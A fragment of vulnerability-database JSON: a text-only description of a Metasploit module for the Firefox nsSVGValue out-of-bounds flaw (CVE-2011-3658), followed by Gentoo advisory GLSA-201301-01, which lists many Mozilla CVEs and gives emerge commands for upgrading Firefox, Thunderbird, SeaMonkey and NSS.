"2020-10-13T00:45:01", "description": "This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1). The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y) uses a loop which can result in an out-of-bounds access to attacker-controlled memory. The mObserver ElementAt() function (which picks up pointers), does not validate if a given index is out of bound. If a custom observer of nsSVGValue is created, which removes elements from the original observer, and memory layout is manipulated properly, the ElementAt() function might pick up an attacker provided pointer, which can be leveraged to gain remote arbitrary code execution.\n", "published": "2012-05-08T02:41:03", "type": "metasploit", "title": "Firefox nsSVGValue Out-of-Bounds Access Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3658"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MOZILLA_NSSVGVALUE", "href": "", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/mozilla_nssvgvalue.rb"}], "gentoo": [{"lastseen": "2016-09-06T19:46:13", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2009-0355", "CVE-2011-0061", "CVE-2011-0077", "CVE-2012-0478", "CVE-2012-4193", "CVE-2011-1202", "CVE-2012-0442", "CVE-2010-3772", "CVE-2011-0071", "CVE-2009-2470", "CVE-2010-0654", "CVE-2009-3388", "CVE-2012-1962", "CVE-2012-0443", "CVE-2011-3866", "CVE-2011-0068", "CVE-2012-5842", "CVE-2012-4212", "CVE-2009-2477", "CVE-2009-1563", "CVE-2010-0176", "CVE-2011-3640", "CVE-2011-0083", "CVE-2010-1203", "CVE-2009-3076", "CVE-2012-1970", "CVE-2009-3389", "CVE-2008-3835", "CVE-2012-3989", "CVE-2010-2762", "CVE-2012-5830", "CVE-2012-4210", "CVE-2009-1305", "CVE-2011-3026", "CVE-2009-3979", "CVE-2011-2370", "CVE-2012-0460", "CVE-2012-1973", "CVE-2009-3376", "CVE-2011-2369", "CVE-2011-2998", "CVE-2011-3654", "CVE-2011-2605", "CVE-2009-1833", "CVE-2010-0165", "CVE-2012-1974", "CVE-2010-0220", "CVE-2010-2766", "CVE-2011-2993", "CVE-2012-4195", "CVE-2010-0168", "CVE-2012-3986", "CVE-2010-0160", "CVE-2009-1169", "CVE-2011-2371", "CVE-2009-3379", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2012-5354", "CVE-2012-4206", "CVE-2009-3071", "CVE-2012-3968", "CVE-2010-1214", "CVE-2012-3963", "CVE-2010-0174", "CVE-2010-0172", "CVE-2009-2535", "CVE-2012-0452", "CVE-2009-1312", "CVE-2012-1956", "CVE-2012-3978", "CVE-2012-3985", "CVE-2011-2995", "CVE-2012-5829", "CVE-2009-1571", "CVE-2008-5505", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2009-2210", "CVE-2009-2478", "CVE-2008-6961", "CVE-2012-0479", "CVE-2012-0450", "CVE-2012-1940", "CVE-2012-3993", "CVE-2008-5500", "CVE-2012-5836", "CVE-2009-3274", "CVE-2010-1125", "CVE-2009-0772", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2010-3131", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2012-3976", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2010-0170", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2007-2436", "CVE-2012-3962", "CVE-2010-2770", "CVE-2010-3774", "CVE-2012-0459", "CVE-2011-2362", "CVE-2009-1304", "CVE-2010-1213", "CVE-2010-3177", "CVE-2012-5843", "CVE-2009-1835", "CVE-2011-0085", "CVE-2009-0352", "CVE-2009-3984", "CVE-2009-3380", "CVE-2008-5510", "CVE-2011-0080", "CVE-2012-1950", "CVE-2008-5502", "CVE-2009-3981", "CVE-2010-3765", "CVE-2010-0167", "CVE-2009-3373", "CVE-2009-3980", "CVE-2008-4070", "CVE-2012-4183", "CVE-2010-3178", "CVE-2012-1994", "CVE-2011-3661", "CVE-2009-3383", "CVE-2012-4181", "CVE-2011-3652", "CVE-2009-1311", "CVE-2011-1712", "CVE-2008-4067", "CVE-2010-1210", "CVE-2011-2364", "CVE-2009-2469", "CVE-2011-0073", "CVE-2010-1197", "CVE-2010-1207", "CVE-2009-0652", "CVE-2012-4186", "CVE-2012-1948", "CVE-2008-5012", "CVE-2011-2982", "CVE-2012-1938", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2009-1838", "CVE-2012-1953", "CVE-2008-5013", "CVE-2012-1949", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3773", "CVE-2009-1309", "CVE-2011-0079", "CVE-2010-3169", "CVE-2009-2662", "CVE-2012-3970", "CVE-2011-2997", "CVE-2011-0053", "CVE-2009-1832", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2012-1966", "CVE-2010-3768", "CVE-2009-3372", "CVE-2010-2763", "CVE-2011-0066", "CVE-2010-1212", "CVE-2009-1837", "CVE-2010-1206", "CVE-2010-1211", "CVE-2009-2464", "CVE-2011-2990", "CVE-2010-1121", "CVE-2009-0356", "CVE-2011-3389", "CVE-2010-0164", "CVE-2008-3836", "CVE-2010-3167", "CVE-2012-4202", "CVE-2007-2671", "CVE-2011-2984", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2009-3986", "CVE-2012-1941", "CVE-2009-2408", "CVE-2010-3399", "CVE-2009-2665", "CVE-2008-4066", "CVE-2008-5018", "CVE-2009-3978", "CVE-2012-3984", "CVE-2009-0354", "CVE-2009-3079", "CVE-2011-0056", "CVE-2012-0444", "CVE-2011-3650", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2010-1215", "CVE-2012-4182", "CVE-2011-2980", "CVE-2012-4187", "CVE-2008-4069", "CVE-2010-0166", "CVE-2011-3647", "CVE-2011-0065", "CVE-2011-0062", "CVE-2008-0016", "CVE-2009-0358", "CVE-2011-3101", "CVE-2010-3168", "CVE-2010-0173", "CVE-2009-1044", "CVE-2008-5513", "CVE-2008-4059", "CVE-2010-2764", "CVE-2011-0081", "CVE-2009-0771", "CVE-2009-1392", "CVE-2008-5504", "CVE-2008-5019", "CVE-2012-1954", "CVE-2009-0774", "CVE-2009-3375", "CVE-2012-0461", "CVE-2011-2376", "CVE-2009-2472", "CVE-2012-3958", "CVE-2009-0071", "CVE-2008-5023", "CVE-2012-0469", "CVE-2010-3171", "CVE-2009-3072", "CVE-2012-3973", "CVE-2008-5822", "CVE-2012-1975", "CVE-2011-0075", "CVE-2012-0464", "CVE-2012-1967", "CVE-2011-3653", "CVE-2010-0648", "CVE-2010-0178", "CVE-2010-3166", "CVE-2010-0177", "CVE-2011-0074", "CVE-2012-3956", "CVE-2010-2769", "CVE-2011-3649", "CVE-2012-3982", "CVE-2009-3555", "CVE-2011-2989", "CVE-2010-1196", "CVE-2008-3837", "CVE-2009-0357", "CVE-2008-5021", "CVE-2008-5017", "CVE-2012-3966", "CVE-2012-5839", "CVE-2011-2378", "CVE-2009-1308", "CVE-2010-3775", "CVE-2009-2467", "CVE-2012-1961", "CVE-2010-5074", "CVE-2011-2996", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2012-3967", "CVE-2011-3651", "CVE-2008-4060", "CVE-2010-0181", "CVE-2012-1951", "CVE-2012-0475", "CVE-2012-3965", "CVE-2012-1952", "CVE-2010-1201", "CVE-2011-4688", "CVE-2009-1306", "CVE-2010-1585", "CVE-2009-2479", "CVE-2012-3959", "CVE-2012-0455", "CVE-2009-0777", "CVE-2010-2755", "CVE-2011-0084", "CVE-2011-0051", "CVE-2010-3767", "CVE-2012-1939", "CVE-2009-1834", "CVE-2010-3771", "CVE-2010-0183", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2008-0367", "CVE-2008-4058", "CVE-2011-3002", "CVE-2012-4184", "CVE-2011-0057", "CVE-2012-0447", "CVE-2011-3232", "CVE-2008-5913", "CVE-2007-3073", "CVE-2012-4205", "CVE-2010-2751", "CVE-2009-1836", "CVE-2011-0069", "CVE-2008-5022", "CVE-2008-5512", "CVE-2012-3992", "CVE-2009-3374", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2011-3004", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2009-1839", "CVE-2012-1960", "CVE-2012-0445", "CVE-2009-3074", "CVE-2012-1965", "CVE-2011-3670", "CVE-2012-0462", "CVE-2010-1028", "CVE-2010-0162", "CVE-2011-2377", "CVE-2009-2463", "CVE-2009-2061", "CVE-2009-3070", "CVE-2012-3977", "CVE-2011-3000", "CVE-2010-2765", "CVE-2009-3069", "CVE-2010-0171", "CVE-2010-2767", "CVE-2009-0353", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2009-0775", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2009-2044", "CVE-2010-3182", "CVE-2009-0776", "CVE-2009-3371", "CVE-2009-3377", "CVE-2012-1959", "CVE-2011-2363", "CVE-2009-3075", "CVE-2010-0163", "CVE-2010-1208", "CVE-2011-0070", "CVE-2012-1947", "CVE-2009-1841", "CVE-2010-3170", "CVE-2011-3005", "CVE-2011-0059", "CVE-2012-1971", "CVE-2009-3983", "CVE-2012-4208", "CVE-2009-3987", "CVE-2011-3658", "CVE-2011-2373", "CVE-2008-5511", "CVE-2012-1957", "CVE-2012-1958", "CVE-2011-0054", "CVE-2012-4190", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2010-3183", "CVE-2009-2654", "CVE-2010-1202", "CVE-2012-0468", "CVE-2009-3982", "CVE-2009-3985", "CVE-2009-2065", "CVE-2009-1313", "CVE-2009-3382", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2010-3770", "CVE-2008-4061", "CVE-2010-1199", "CVE-2012-4204", "CVE-2008-0017", "CVE-2009-3988", "CVE-2010-3400", "CVE-2009-1302", "CVE-2011-2985", "CVE-2009-2466", "CVE-2012-4192", "CVE-2011-0058", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2008-5024", "CVE-2011-0076", "CVE-2007-2437", "CVE-2012-5833", "CVE-2011-2999", "CVE-2012-3964", "CVE-2012-5841", "CVE-2010-0179", "CVE-2010-1209", "CVE-2010-2754", "CVE-2008-5507", "CVE-2009-2471", "CVE-2012-3990", "CVE-2011-2375", "CVE-2010-1198", "CVE-2008-4065", "CVE-2009-1840", "CVE-2011-3665", "CVE-2009-3381", "CVE-2011-0067", "CVE-2010-2760", "CVE-2012-1937", "CVE-2012-4215", "CVE-2009-2043", "CVE-2009-1307", "CVE-2009-2664", "CVE-2012-0463", "CVE-2010-4508", "CVE-2009-1310", "CVE-2009-3077", "CVE-2011-3003", "CVE-2011-2991", "CVE-2008-5015", "CVE-2011-0082", "CVE-2011-2983", "CVE-2012-4179", "CVE-2008-4582", "CVE-2011-3001", "CVE-2012-1964", "CVE-2009-2462", "CVE-2009-3378", "CVE-2011-3062", "CVE-2009-1303", "CVE-2012-0477", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2009-2404", "CVE-2009-2465", "CVE-2012-0467", "CVE-2011-2981", "CVE-2012-0458", "CVE-2010-0169", "CVE-2010-2752", "CVE-2009-3078", "CVE-2012-0471", "CVE-2012-3961", "CVE-2010-3766", "CVE-2012-3971", "CVE-2008-5052", "CVE-2011-0055", "CVE-2009-1828", "CVE-2011-0072"], "description": "### Background\n\nMozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the \u2018Mozilla Application Suite\u2019. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications such as Firefox and Thunderbird. NSS is Mozilla\u2019s Network Security Services library that implements PKI support. IceCat is the GNU version of Firefox. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, bypass restrictions and protection mechanisms, force file downloads, conduct XML injection attacks, conduct XSS attacks, bypass the Same Origin Policy, spoof URL\u2019s for phishing attacks, trigger a vertical scroll, spoof the location bar, spoof an SSL indicator, modify the browser\u2019s font, conduct clickjacking attacks, or have other unspecified impact. \n\nA local attacker could gain escalated privileges, obtain sensitive information, or replace an arbitrary downloaded file. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla Firefox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nAll users of the Mozilla Firefox binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nAll Mozilla Thunderbird users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nAll users of the Mozilla Thunderbird binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nAll Mozilla SeaMonkey users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-2.14-r1\"\n \n\nAll users of the Mozilla SeaMonkey binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-bin-2.14\"\n \n\nAll NSS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/nss-3.14\"\n \n\nThe \u201cwww-client/mozilla-firefox\u201d package has been merged into the \u201cwww-client/firefox\u201d package. To upgrade, please unmerge \u201cwww-client/mozilla-firefox\u201d and then emerge the latest \u201cwww-client/firefox\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nThe \u201cwww-client/mozilla-firefox-bin\u201d package has been merged into the \u201cwww-client/firefox-bin\u201d package. To upgrade, please unmerge \u201cwww-client/mozilla-firefox-bin\u201d and then emerge the latest \u201cwww-client/firefox-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox-bin\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird\u201d package has been merged into the \u201cmail-client/thunderbird\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird\u201d and then emerge the latest \u201cmail-client/thunderbird\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird\"\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird-bin\u201d package has been merged into the \u201cmail-client/thunderbird-bin\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird-bin\u201d and then emerge the latest \u201cmail-client/thunderbird-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird-bin\"\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nGentoo discontinued support for GNU IceCat. We recommend that users unmerge GNU IceCat: \n \n \n # emerge --unmerge \"www-client/icecat\"\n \n\nGentoo discontinued support for XULRunner. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner\"\n \n\nGentoo discontinued support for the XULRunner binary package. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner-bin\"", "edition": 1, "modified": "2013-01-08T00:00:00", "published": "2013-01-08T00:00:00", "id": "GLSA-201301-01", "href": "https://security.gentoo.org/glsa/201301-01", "type": "gentoo", "title": "Mozilla Products: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
